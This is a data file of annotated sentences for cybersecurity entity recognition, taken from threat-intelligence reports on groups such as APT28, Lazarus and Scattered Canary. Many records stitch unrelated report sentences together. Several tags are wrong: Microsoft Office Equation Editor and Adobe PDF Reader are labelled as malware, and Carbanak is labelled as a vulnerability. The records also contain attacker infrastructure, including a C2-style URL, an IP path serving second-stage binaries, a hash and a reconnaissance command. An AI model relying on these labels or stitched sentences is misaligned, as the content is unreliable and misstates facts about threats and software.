JavaScript payload containing a malware implant known as SHIRIME . Today , this malware is still actively being used against the Philippines .", "spans": {"MALWARE: st07383.en17.docx": [[12, 29]], "VULNERABILITY: CVE-2017-0001": [[80, 93]], "MALWARE: SHIRIME": [[199, 206]], "FILEPATH: malware": [[222, 229]]}, "info": {"id": "cyberner_stix_train_006077", "source": "cyberner_stix_train"}} {"text": "If the actor wishes to download an additional payload to the compromised host , they will respond by sending emails in the following steps .", "spans": {"TOOL: emails": [[109, 115]]}, "info": {"id": "cyberner_stix_train_006078", "source": "cyberner_stix_train"}} {"text": "As this approach was not a great success , their last attempt was to quickly create a World Cup app and this time distribute it to Israeli citizens , not just soldiers . POSHSPY is an excellent example of the skill and craftiness of APT29 . Once executed the Ursnif sample will conduct the typical actions observed in Ursnif samples , like credential harvesting , gathering system and process information , and deploying additional malware samples . 
Other big stories in June include a suspected LockBit affiliate arrest , the Royal ransomware gang toying with a new encryptor , and a notable increase in attacks on the Manufacturing sector .", "spans": {"TOOL: POSHSPY": [[170, 177]], "THREAT_ACTOR: APT29": [[233, 238]], "MALWARE: Ursnif": [[259, 265], [318, 324]], "THREAT_ACTOR: LockBit": [[496, 503]], "THREAT_ACTOR: Royal ransomware gang": [[527, 548]], "TOOL: new encryptor": [[563, 576]], "ORGANIZATION: Manufacturing sector": [[620, 640]]}, "info": {"id": "cyberner_stix_train_006079", "source": "cyberner_stix_train"}} {"text": "Given the level of overlap already , I proceeded to grab all of the passive DNS available for each of the 707 IP addresses .", "spans": {}, "info": {"id": "cyberner_stix_train_006080", "source": "cyberner_stix_train"}} {"text": "To date , all observed Snake Wine 's attacks were the result of spear phishing attempts against the victim organizations . And , finally , with the upcoming Creators Update , Windows Defender ATP will provide additional capabilities for detecting threats such as Winnti , as well as centralized response options , such as machine isolation and file blocking , that will enable fast containment of known attack jump off points .", "spans": {"THREAT_ACTOR: Snake Wine": [[23, 33]], "MALWARE: Creators Update": [[157, 172]], "ORGANIZATION: Windows Defender ATP": [[175, 195]], "MALWARE: Winnti": [[263, 269]]}, "info": {"id": "cyberner_stix_train_006081", "source": "cyberner_stix_train"}} {"text": "Another similarity is that Suckfly stole a certificate from Company D ( see Figure 4 ) less than two years after Blackfly had stolen a certificate from the same company .", "spans": {"THREAT_ACTOR: Suckfly": [[27, 34]], "THREAT_ACTOR: Blackfly": [[113, 121]]}, "info": {"id": "cyberner_stix_train_006082", "source": "cyberner_stix_train"}} {"text": "If the malware successfully became the default SMS app , it sends the words “ the app has been replaced ” in Russian . 
This particular unit is believed to hack into victim companies throughout the world in order to steal corporate trade secrets , primarily relating to the satellite , aerospace and communication industries . In other attacks , there was evidence that Felismus was installed using a tool known as Starloader ( detected by Symantec as Trojan.Starloader ) .", "spans": {"ORGANIZATION: aerospace": [[285, 294]], "ORGANIZATION: communication industries": [[299, 323]], "MALWARE: Felismus": [[369, 377]], "MALWARE: Starloader": [[414, 424]], "ORGANIZATION: Symantec": [[439, 447]], "MALWARE: Trojan.Starloader": [[451, 468]]}, "info": {"id": "cyberner_stix_train_006083", "source": "cyberner_stix_train"}} {"text": "Two security companies , Cymmetria and Kaspersky , each recently released reports on the campaign , most of which are in line with our observations . The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists .", "spans": {"ORGANIZATION: Kaspersky": [[39, 48]]}, "info": {"id": "cyberner_stix_train_006084", "source": "cyberner_stix_train"}} {"text": "These campaigns use PinchDuke samples that were , according to their compilation timestamps , created on the 5th and 12th of November 2008 .", "spans": {"MALWARE: PinchDuke": [[20, 29]]}, "info": {"id": "cyberner_stix_train_006085", "source": "cyberner_stix_train"}} {"text": "A Base64 encoded string containing the victim's full email address is passed with this URL , prepopulating a fake Google login page displayed to the victim .", "spans": {"TOOL: email": [[53, 58]], "ORGANIZATION: Google": [[114, 120]]}, "info": {"id": "cyberner_stix_train_006086", "source": "cyberner_stix_train"}} {"text": "McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 . 
Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) .", "spans": {"ORGANIZATION: McAfee": [[0, 6]], "THREAT_ACTOR: Lazarus": [[64, 71], [219, 226]], "MALWARE: malicious document": [[193, 211]], "THREAT_ACTOR: Ke3chang": [[255, 263]], "TOOL: Java": [[285, 289]], "VULNERABILITY: zero-day": [[290, 298]], "VULNERABILITY: CVE-2012-4681": [[315, 328]], "FILEPATH: Microsoft Word": [[374, 388]], "VULNERABILITY: CVE-2010-3333": [[391, 404]], "MALWARE: Adobe PDF Reader": [[411, 427]], "VULNERABILITY: CVE-2010-2883": [[430, 443]]}, "info": {"id": "cyberner_stix_train_006087", "source": "cyberner_stix_train"}} {"text": "The lure content in the malicious files relates to political affairs in the Middle East , with specific references to the Israeli-Palestinian conflict , tension between Hamas and Fatah , and other political entities in the region .", "spans": {"ORGANIZATION: Hamas": [[169, 174]], "ORGANIZATION: Fatah": [[179, 184]]}, "info": {"id": "cyberner_stix_train_006088", "source": "cyberner_stix_train"}} {"text": "The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term “ MiniDuke ” to identify the first Duke related malware they found .", "spans": {"THREAT_ACTOR: Duke": [[19, 23], [146, 150]], "ORGANIZATION: Kaspersky Labs": [[80, 94]], "MALWARE: MiniDuke": [[113, 121]]}, "info": {"id": "cyberner_stix_train_006089", "source": "cyberner_stix_train"}} {"text": "Data collectors are used in conjunction with repeated commands to collect user data including , SMS settings , SMS messages , Call logs , Browser History , Calendar , Contacts , Emails , and messages from selected messaging apps , including WhatsApp , Twitter , Facebook , Kakoa , Viber , and Skype by making /data/data directories of the apps world readable . 
The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013 , dubbed TEMP.Periscope . Winnti : a260dcf1 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php . Command - line execution of MicroSCADA “ Scilc.exe ” binary and other native MicroSCADA binaries that may be leveraged to execute unauthorized SCIL program / commands .", "spans": {"SYSTEM: WhatsApp": [[241, 249]], "SYSTEM: Twitter": [[252, 259]], "SYSTEM: Facebook": [[262, 270]], "SYSTEM: Kakoa": [[273, 278]], "SYSTEM: Viber": [[281, 286]], "SYSTEM: Skype": [[293, 298]], "THREAT_ACTOR: group": [[389, 394]], "THREAT_ACTOR: cyber espionage actors": [[416, 438]], "THREAT_ACTOR: TEMP.Periscope": [[475, 489]], "THREAT_ACTOR: Winnti": [[492, 498]], "URL: https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php": [[530, 596]]}, "info": {"id": "cyberner_stix_train_006090", "source": "cyberner_stix_train"}} {"text": "Throughout October and into early November , WikiLeaks published 34 batches of email correspondence stolen from John Podesta ’s personal email account .", "spans": {"TOOL: WikiLeaks": [[45, 54]], "TOOL: email": [[79, 84], [137, 142]]}, "info": {"id": "cyberner_stix_train_006091", "source": "cyberner_stix_train"}} {"text": "Regarding the timing of these campaigns , it is curious to note that they began only 11 days after President Barack Obama gave a speech on the 5th of April declaring his intention to proceed with the deployment of these missile defenses .", "spans": {}, "info": {"id": "cyberner_stix_train_006092", "source": "cyberner_stix_train"}} {"text": "Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs . 
Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can′t prove they were related to this particular attack .", "spans": {"THREAT_ACTOR: attackers": [[61, 70]], "VULNERABILITY: CVE-2017-11882": [[182, 196]], "MALWARE: Microsoft Office Equation Editor": [[199, 231]]}, "info": {"id": "cyberner_stix_train_006093", "source": "cyberner_stix_train"}} {"text": "Japan Post - A private Japanese post , logistics and courier headquartered in Tokyo . Using data from Recorded Future Domain Analysis and combining it with data derived from Recorded Future Network Traffic Analysis , Insikt Group researchers were able to identify a small selection of likely targeted organizations impacted by suspected APT33 activity . Starting in February 2018 , Palo Alto Networks Unit 42 identified a", "spans": {"ORGANIZATION: Japan Post": [[0, 10]], "ORGANIZATION: Recorded Future": [[102, 117]], "ORGANIZATION: Insikt Group": [[217, 229]], "THREAT_ACTOR: APT33": [[337, 342]], "ORGANIZATION: Palo Alto Networks Unit 42": [[382, 408]]}, "info": {"id": "cyberner_stix_train_006094", "source": "cyberner_stix_train"}} {"text": "Background : Android surveillanceware Early last year , Lookout discovered a sophisticated Android surveillanceware agent that appears to have been created for the lawful intercept market . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . 
Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network .", "spans": {"SYSTEM: Android": [[13, 20], [91, 98]], "ORGANIZATION: Lookout": [[56, 63]], "VULNERABILITY: Carbanak": [[190, 198]], "ORGANIZATION: consumer": [[266, 274]], "TOOL: Carberp": [[366, 373]], "ORGANIZATION: DeepSight Managed Adversary and Threat Intelligence": [[392, 443]], "ORGANIZATION: MATI": [[446, 450]], "FILEPATH: Backdoor.Powemuddy": [[486, 504]], "THREAT_ACTOR: Seedworm": [[523, 531]], "FILEPATH: Powermud backdoor": [[535, 552]], "MALWARE: POWERSTATS": [[559, 569]], "VULNERABILITY: exploit": [[696, 703]]}, "info": {"id": "cyberner_stix_train_006095", "source": "cyberner_stix_train"}} {"text": "No guest credentials were observed being stolen at the compromised hotels ; however , in a separate incident that occurred in Fall 2016 , APT28 gained initial access to a victim ’s network via credentials likely stolen from a hotel Wi-Fi network .", "spans": {"THREAT_ACTOR: APT28": [[138, 143]], "TOOL: Wi-Fi network": [[232, 245]]}, "info": {"id": "cyberner_stix_train_006096", "source": "cyberner_stix_train"}} {"text": "The majority of the code for TINYTYPHON is taken from the MyDoom worm and has been repurposed to find and exfiltrate documents . 
The Mofang group has been active in relation to the Kyaukphyu sez .", "spans": {"TOOL: MyDoom worm": [[58, 69]], "THREAT_ACTOR: Mofang group": [[133, 145]]}, "info": {"id": "cyberner_stix_train_006097", "source": "cyberner_stix_train"}} {"text": "SNAKEMACKEREL is an espionage-motivated cyber threat group , also known as Sofacy , Pawn Storm , Sednit , Fancy Bear , APT28 , Group 74 , Tsar Team , and Strontium .", "spans": {"THREAT_ACTOR: SNAKEMACKEREL": [[0, 13]], "THREAT_ACTOR: Sofacy": [[75, 81]], "THREAT_ACTOR: Pawn Storm": [[84, 94]], "THREAT_ACTOR: Sednit": [[97, 103]], "THREAT_ACTOR: Fancy Bear": [[106, 116]], "THREAT_ACTOR: APT28": [[119, 124]], "THREAT_ACTOR: Group 74": [[127, 135]], "THREAT_ACTOR: Tsar Team": [[138, 147]], "THREAT_ACTOR: Strontium": [[154, 163]]}, "info": {"id": "cyberner_stix_train_006098", "source": "cyberner_stix_train"}} {"text": "PittyTiger leverages social engineering to deliver spearphishing emails , in a variety of languages including English , French and Chinese , and email phishing pages to their targets . 
GhostNet represents a network of compromised computers resident in high-value political , economic , and media locations spread across numerous countries worldwide .", "spans": {"THREAT_ACTOR: PittyTiger": [[0, 10]], "ORGANIZATION: social engineering": [[21, 39]], "ORGANIZATION: political": [[263, 272]], "ORGANIZATION: economic": [[275, 283]], "ORGANIZATION: media": [[290, 295]]}, "info": {"id": "cyberner_stix_train_006099", "source": "cyberner_stix_train"}} {"text": "The Sofacy group has leveraged open source or freely available tools and exploits in the past but this is the first time that Unit 42 has observed them leveraging the Koadic toolkit .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]], "ORGANIZATION: Unit 42": [[126, 133]], "TOOL: Koadic": [[167, 173]]}, "info": {"id": "cyberner_stix_train_006100", "source": "cyberner_stix_train"}} {"text": "Palo Alto Networks customers are protected from Downeks and Quasar used in this attack :", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], "MALWARE: Downeks": [[48, 55]], "MALWARE: Quasar": [[60, 66]]}, "info": {"id": "cyberner_stix_train_006101", "source": "cyberner_stix_train"}} {"text": "How do Android devices become infected ? This is evidence of shared motivation and intent to target the SWIFT system by the North Korean operators performing the reconnaissance and APT38 which later targeted that organization . We defined two patterns for analysis of the ANEL sample . 
the second with invalid handle 0 , will return 0 or should be 0 in normal systems , this could be antisandboxemulation not sure as the functions return value is not used .", "spans": {"THREAT_ACTOR: operators": [[137, 146]], "THREAT_ACTOR: APT38": [[181, 186]], "MALWARE: ANEL": [[272, 276]]}, "info": {"id": "cyberner_stix_train_006102", "source": "cyberner_stix_train"}} {"text": "Many of the strings in the application are XOR 'd with the key Kjk1MmphFG : After some additional requests , the dropper made a POST request to https : //54.71.249.137/56e087c9-fc56-49bb-bbd0-4fafc4acd6e1 which returned a zip file containing the second stage binaries . In early November 2018 , CrowdStrike observed activity from the HELIX KITTEN adversary at a customer in the telecommunications vertical . Additionally the attackers implemented anti-VM ( and sandbox ) and anti-analysis tricks to hide the malicious activities to the analyst . Harrison signed his threatening missive with the salutation , “ We are legion , ” suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers .", "spans": {"ORGANIZATION: CrowdStrike": [[295, 306]], "THREAT_ACTOR: HELIX KITTEN": [[334, 346]], "ORGANIZATION: telecommunications": [[378, 396]], "TOOL: anti-VM": [[447, 454]], "TOOL: sandbox": [[461, 468]], "TOOL: anti-analysis tricks": [[475, 495]], "THREAT_ACTOR: Harrison": [[546, 554]], "ORGANIZATION: Ashley Madison": [[685, 699]]}, "info": {"id": "cyberner_stix_train_006103", "source": "cyberner_stix_train"}} {"text": "In the following paragraphs , we outline our efforts to discover other applications from the same developer and protect our users from it . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . 
Filename: beauty.scr .", "spans": {"MALWARE: malicious documents": [[169, 188]], "VULNERABILITY: CVE-2017-0199": [[200, 213]], "TOOL: LATENTBOT malware": [[239, 256]], "FILEPATH: beauty.scr": [[269, 279]]}, "info": {"id": "cyberner_stix_train_006104", "source": "cyberner_stix_train"}} {"text": "According to Wikipedia , the CSS was formed in 1972 to integrate the NSA and the Service Cryptologic Elements ( SCE ) of the U.S armed forces . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": {"ORGANIZATION: banking": [[238, 245]], "TOOL: emails": [[299, 305]], "ORGANIZATION: bank employees": [[333, 347]]}, "info": {"id": "cyberner_stix_train_006105", "source": "cyberner_stix_train"}} {"text": "PHA authors usually try to hide their tracks , so attribution is difficult . At the end of June 2015 Mofang started its campaign to gather information of a specific target in relation to the sezs : the cpg Corporation . IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control ( C2 ) server and uniform resource locator ( URL ) path . Per Microsoft ’s blog , they have identified additional post - exploitation activities , including : • Compression of data for exfiltration via 7 - Zip . • Use of Exchange PowerShell Snap - ins to export mailbox data .", "spans": {"ORGANIZATION: cpg Corporation": [[202, 217]], "MALWARE: IRONHALO": [[220, 228]], "TOOL: command-and-control": [[328, 347]], "TOOL: C2": [[350, 352]], "ORGANIZATION: Microsoft ’s": [[410, 422]]}, "info": {"id": "cyberner_stix_train_006106", "source": "cyberner_stix_train"}} {"text": "mobile_treats_2013_06s It extorts money from users by threatening to block the smartphone : it displays a message demanding $ 500 to unblock the device . 
The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including research and pharmaceutical companies . Once the RAT is installed on the host it will be used to administer the client , exfiltrate data , or leverage the client as a pivot to attack an organization ’s internal infrastructure . The group has since earned infamy for being involved in malicious activities associated with targeted attacks , such as deploying spear - phishing campaigns and building a backdoor .", "spans": {"TOOL: Epic Turla": [[175, 185]], "ORGANIZATION: pharmaceutical companies": [[277, 301]], "TOOL: RAT": [[313, 316]]}, "info": {"id": "cyberner_stix_train_006107", "source": "cyberner_stix_train"}} {"text": "( read SMS messages ) Obviously a fairly significant list of permissions of which many are suspicious , especially when combined . Originally , the main infection vector of Blue Termite was spear-phishing emails . Threat Spotlight : Group 72 , Opening the ZxShell . Adversaries may communicate using a protocol and port pairing that are typically not associated .", "spans": {"TOOL: Blue Termite": [[173, 185]], "THREAT_ACTOR: Group 72": [[233, 241]], "MALWARE: ZxShell": [[256, 263]], "THREAT_ACTOR: Adversaries": [[266, 277]]}, "info": {"id": "cyberner_stix_train_006108", "source": "cyberner_stix_train"}} {"text": "The malicious payload was spread across multiple PowerShell scripts , making its execution difficult to trace .", "spans": {"MALWARE: malicious payload": [[4, 21]], "TOOL: multiple PowerShell scripts": [[40, 67]]}, "info": {"id": "cyberner_stix_train_006109", "source": "cyberner_stix_train"}} {"text": "Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . 
Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": {"THREAT_ACTOR: APT41": [[41, 46]], "THREAT_ACTOR: Patchwork": [[214, 223]], "VULNERABILITY: exploit": [[253, 260]], "VULNERABILITY: CVE-2015-1641": [[393, 406]], "VULNERABILITY: CVE-2017-11882": [[411, 425]]}, "info": {"id": "cyberner_stix_train_006110", "source": "cyberner_stix_train"}} {"text": "In the Windows space , Twitter , founded in 2006 , was first used to control botnets as early as in 2009 . Using personal information obtained from various sources , Scattered Canary started perpetrating fraud against US federal and state government agencies . We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations , while a substantially smaller units within the group , which we have dubbed Bluenoroff , is responsible for financial profit .", "spans": {"SYSTEM: Windows": [[7, 14]], "ORGANIZATION: Twitter": [[23, 30]], "THREAT_ACTOR: Scattered Canary": [[166, 182]], "ORGANIZATION: state government agencies": [[233, 258]], "THREAT_ACTOR: Lazarus Group": [[277, 290]], "THREAT_ACTOR: Bluenoroff": [[441, 451]]}, "info": {"id": "cyberner_stix_train_006111", "source": "cyberner_stix_train"}} {"text": "In this blog , Unit 42 provides details of the tools and tactics we observed on these compromised SharePoint servers , explain how we believe these connect to the Emissary Panda threat group . This investigation by the Agari Cyber Intelligence Division into the cybercriminal group we’ve named Scattered Canary offers unprecedented visibility into eleven years of fraud and criminal activities , and the growth of a 419 startup into a fully operational BEC business . 
While this criminal organization’s activities now center around BEC , and extend to romance scams , credit card fraud , check fraud , fake job listings , credential harvesting , tax schemes , and more , these actors came from much humbler beginnings , starting with basic Craigslist scams in 2008 . On November 29 , 2018 , Scattered Canary sent an attack email to Agari CFO Raymond Lim , enquiring as to his availability to send out a domestic wire transfer . Many feel that they have a home team advantage living in Nigeria , where they are free to pay off law enforcement to look the other ACT . Scattered Canary’s fraudulent history can be traced as far back as October 2008 , when the group first arrived on the cybercriminal circuit . By March 2016 , one of Scattered Canary’s members had built enough trust with a romance victim—who we’ll call Jane—that she became a frequent source of new mule accounts for the group . Alpha’s early role was fairly simple: engage with individuals , who he chose based on the goods they were selling , and then provide personal shipping addresses back to Omega . By all accounts , late 2015 was the beginning of BEC for Scattered Canary . The first type of attack Scattered Canary pivoted to was credential phishing . Between July 2015 and February 2016 , Scattered Canary’s primary focus seemed to be mass harvesting general credentials using a Google Docs phishing page . In the first few months of their credential phishing ventures , Scattered Canary’s sights were mostly set on Asian targets—Malaysia and Japan , in particular . In November 2015 , the group started to focus on North American users , mostly in the United States . 
This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills .", "spans": {"ORGANIZATION: Unit 42": [[15, 22]], "TOOL: SharePoint servers": [[98, 116]], "THREAT_ACTOR: Emissary Panda": [[163, 177]], "ORGANIZATION: Agari Cyber Intelligence": [[219, 243]], "THREAT_ACTOR: Scattered Canary": [[294, 310], [791, 807], [1628, 1644], [1672, 1688], [2219, 2235]], "ORGANIZATION: business": [[457, 465]], "ORGANIZATION: organization’s": [[488, 502]], "TOOL: email": [[823, 828]], "THREAT_ACTOR: they": [[1001, 1005]], "THREAT_ACTOR: Scattered Canary’s": [[1066, 1084], [1231, 1249], [1764, 1782], [1946, 1964]], "THREAT_ACTOR: Alpha’s": [[1394, 1401]]}, "info": {"id": "cyberner_stix_train_006112", "source": "cyberner_stix_train"}} {"text": "China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . Zahlungsinformationen 01.06.2017.zip .", "spans": {"MALWARE: China Chopper": [[0, 13]], "FILEPATH: Zahlungsinformationen 01.06.2017.zip": [[134, 170]]}, "info": {"id": "cyberner_stix_train_006113", "source": "cyberner_stix_train"}} {"text": "Based on what we currently know about the targets chosen by the Dukes over the past 7 years , they appear to have consistently targeted entities that deal with foreign policy and security policy matters .", "spans": {"THREAT_ACTOR: Dukes": [[64, 69]]}, "info": {"id": "cyberner_stix_train_006114", "source": "cyberner_stix_train"}} {"text": "Its origins can be traced back to the Storm Worm , a botnet that emerged in 2007 and was one of the earliest criminal malware infrastructures to leverage peer-to-peer technology . 
Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"ORGANIZATION: technology": [[167, 177]], "ORGANIZATION: Kaspersky": [[180, 189]], "THREAT_ACTOR: BlackOasis group": [[200, 216]], "TOOL: Adobe Flash Player": [[234, 252]], "VULNERABILITY: zero-day": [[253, 261]], "VULNERABILITY: CVE-2016-4117": [[278, 291]], "MALWARE: FinSpy": [[338, 344]]}, "info": {"id": "cyberner_stix_train_006115", "source": "cyberner_stix_train"}} {"text": "It was an existing business model when computer-based banking malware was the only form of banking malware and has shifted to the Android equivalent a few years later . In some cases , Machete trick new victims by sending real documents that had been stolen on the very same day . Although APT38 is distinct from other TEMP.Hermit activity , both groups operate consistently within the interests of the North Korean state .", "spans": {"SYSTEM: Android": [[130, 137]], "THREAT_ACTOR: Machete": [[185, 192]], "THREAT_ACTOR: APT38": [[290, 295]], "THREAT_ACTOR: groups": [[347, 353]]}, "info": {"id": "cyberner_stix_train_006116", "source": "cyberner_stix_train"}} {"text": "XENOTIME operates globally , impacting regions far outside of the Middle East , their initial target .", "spans": {"THREAT_ACTOR: XENOTIME": [[0, 8]]}, "info": {"id": "cyberner_stix_train_006117", "source": "cyberner_stix_train"}} {"text": "The email message test : the message as written ( left ) and as available in the database ( right ) Third , we documented the trojan retrieving the Google Authenticator 2FA code . One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus aka OilRig , APT34 . 
Furthermore , the Advanced Threat Research team has discovered Proxysvc , which appears to be an undocumented implant .", "spans": {"SYSTEM: Google Authenticator": [[148, 168]], "THREAT_ACTOR: Crambus": [[293, 300]], "THREAT_ACTOR: OilRig": [[305, 311]], "THREAT_ACTOR: APT34": [[314, 319]], "ORGANIZATION: Advanced Threat Research": [[340, 364]], "MALWARE: Proxysvc": [[385, 393]]}, "info": {"id": "cyberner_stix_train_006118", "source": "cyberner_stix_train"}} {"text": "Yet the most-recent posting covering TTPs from initial access through prerequisites to enable final delivery of effects on target ( deploying TRITON S-MAL/TRISIS ) avoids the use of the TEMP.Veles term entirely .", "spans": {"MALWARE: TRITON S-MAL/TRISIS": [[142, 161]], "THREAT_ACTOR: TEMP.Veles": [[186, 196]]}, "info": {"id": "cyberner_stix_train_006119", "source": "cyberner_stix_train"}} {"text": "format Asacub format Decrypted data from Asacub traffic : { “ data ” : ” 2015:10:14_02:41:15″ , ” id ” : ” 532bf15a-b784-47e5-92fa-72198a2929f5″ , ” text ” : ” SSB0aG91Z2h0IHdlIGdvdCBwYXN0IHRoaXMhISBJJ20gbm90IGh1bmdyeSBhbmQgbmU= ” , ” number ” : ” 1790″ , ” type In addition to using SWCs to target specific types of organizations , TG-3390 uses spearphishing emails to target specific victims . 2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a install . Utilizing multiple security solutions may become even more important as the level of sophistication in malware grows .", "spans": {"TOOL: SWCs": [[284, 288]], "THREAT_ACTOR: TG-3390": [[333, 340]], "FILEPATH: 2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a": [[396, 460]], "FILEPATH: install": [[461, 468]]}, "info": {"id": "cyberner_stix_train_006120", "source": "cyberner_stix_train"}} {"text": "] ee , is the same one used in the Android version of Project Spy . Once inside the network , the GCMAN group uses legitimate and penetration testing tools such as Putty , VNC , and Meterpreter for lateral movement . 
the new code tries to trace the first blocks to obtain the value and reconnects block number 1 and 2 as successors of block number 7 , They collect , process , and analyze data about cyberthreats from a variety of public and private sources , creating timely , actionable , and engaging intelligence to keep organizations and our global partners up - to - date about today ’s threat landscape .", "spans": {"SYSTEM: Android": [[35, 42]], "SYSTEM: Project Spy": [[54, 65]], "THREAT_ACTOR: GCMAN group": [[98, 109]], "TOOL: Putty": [[164, 169]], "TOOL: VNC": [[172, 175]], "TOOL: Meterpreter": [[182, 193]]}, "info": {"id": "cyberner_stix_train_006121", "source": "cyberner_stix_train"}} {"text": "Displaying HTML pages We ’ ll now look at the HTML pages that Rotexy displays and the actions performed with them . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Analysis of RASPITE tactics , techniques , and procedures ( TTPs ) indicate the group has been active in some form since early - to mid-2017 .", "spans": {"MALWARE: Rotexy": [[62, 68]], "MALWARE: documents": [[120, 129]], "VULNERABILITY: CVE-2012-0158": [[213, 226]], "VULNERABILITY: Microsoft Word vulnerabilities": [[282, 312]], "THREAT_ACTOR: RASPITE": [[369, 376]]}, "info": {"id": "cyberner_stix_train_006122", "source": "cyberner_stix_train"}} {"text": "These 12 hours could have been used to crack a hashed password offline .", "spans": {}, "info": {"id": "cyberner_stix_train_006123", "source": "cyberner_stix_train"}} {"text": "Using the SMS has an initial infection vector is another possibility for the exfiltration . Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials . . 
Understand how the most dangerous Android threat could upend your entire business and how a devious cybercrime campaign on Windows involves in - depth reconnaissance to deliver the damaging malware to your network .", "spans": {"THREAT_ACTOR: Seedworm": [[92, 100]], "TOOL: LaZagne": [[137, 144]], "TOOL: Crackmapexec": [[149, 161]], "TOOL: Android": [[244, 251]], "SYSTEM: Windows": [[333, 340]]}, "info": {"id": "cyberner_stix_train_006124", "source": "cyberner_stix_train"}} {"text": "Given this , I iterated over all 171 samples and extracted the following URL ’s where PowerShell is downloading a payload :", "spans": {"TOOL: PowerShell": [[86, 96]]}, "info": {"id": "cyberner_stix_train_006125", "source": "cyberner_stix_train"}} {"text": "The spring of 2010 saw continued PinchDuke campaigns against Turkey and Georgia , but also numerous campaigns against other members of the Commonwealth of Independent States such as Kazakhstan , Kyrgyzstan , Azerbaijan and Uzbekistan .", "spans": {"MALWARE: PinchDuke": [[33, 42]]}, "info": {"id": "cyberner_stix_train_006126", "source": "cyberner_stix_train"}} {"text": "com.schwab.mobile com.americanexpress.android.acctsvcs.us com.pnc.ecommerce.mobile com.regions.mobbanking com.clairmail.fth com.grppl.android.shell.BOS com.tdbank com.huntington.m com.citizensbank.androidapp com.usbank.mobilebanking com.ally.MobileBanking com.key.android com.unionbank.ecommerce.mobile.android com.mfoundry.mb.android.mb_BMOH071025661 It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data exfiltration from high-profile victim organizations . Rancor : Connect.bafunpda.xyz . 
The archive contained a RAR SFX which installed the malware and showed an empty PDF decoy .", "spans": {"THREAT_ACTOR: attackers": [[408, 417]], "TOOL: Naikon proxies": [[425, 439]], "THREAT_ACTOR: Rancor": [[588, 594]], "DOMAIN: Connect.bafunpda.xyz": [[597, 617]]}, "info": {"id": "cyberner_stix_train_006127", "source": "cyberner_stix_train"}} {"text": "If the server returns this flag as positive , the app will not trigger the adware payload . Kaspersky were also able to produce two reports on Korean speaking actors , specifically involving Scarcruft and Bluenoroff . The last identified campaign where KONNI was used was named Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate.scr .", "spans": {"ORGANIZATION: Kaspersky": [[92, 101]], "THREAT_ACTOR: Scarcruft": [[191, 200]], "THREAT_ACTOR: Bluenoroff": [[205, 215]], "MALWARE: KONNI": [[253, 258]], "FILEPATH: RC_Office_Coordination_Associate.scr": [[323, 359]]}, "info": {"id": "cyberner_stix_train_006128", "source": "cyberner_stix_train"}} {"text": "Sofacy ( also known as “ Fancy Bear ” , “ Sednit ” , “ STRONTIUM ” and “ APT28 ” ) is an advanced threat group that has been active since around 2008 , targeting mostly military and government entities worldwide , with a focus on NATO countries .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "THREAT_ACTOR: Fancy Bear": [[25, 35]], "THREAT_ACTOR: Sednit": [[42, 48]], "THREAT_ACTOR: STRONTIUM": [[55, 64]], "THREAT_ACTOR: APT28": [[73, 78]], "ORGANIZATION: NATO": [[230, 234]]}, "info": {"id": "cyberner_stix_train_006129", "source": "cyberner_stix_train"}} {"text": "The server replies with the actual malicious payload , which includes JavaScript code , a user-agent string and URLs controlled by the malware author . The Chinese intelligence apparatus has been reported on under many names , including Winnti , PassCV , APT17 , Axiom , LEAD , BARIUM , Wicked Panda , and GREF . Otherwise , ZxShell tries to connect to the first item of the list . 
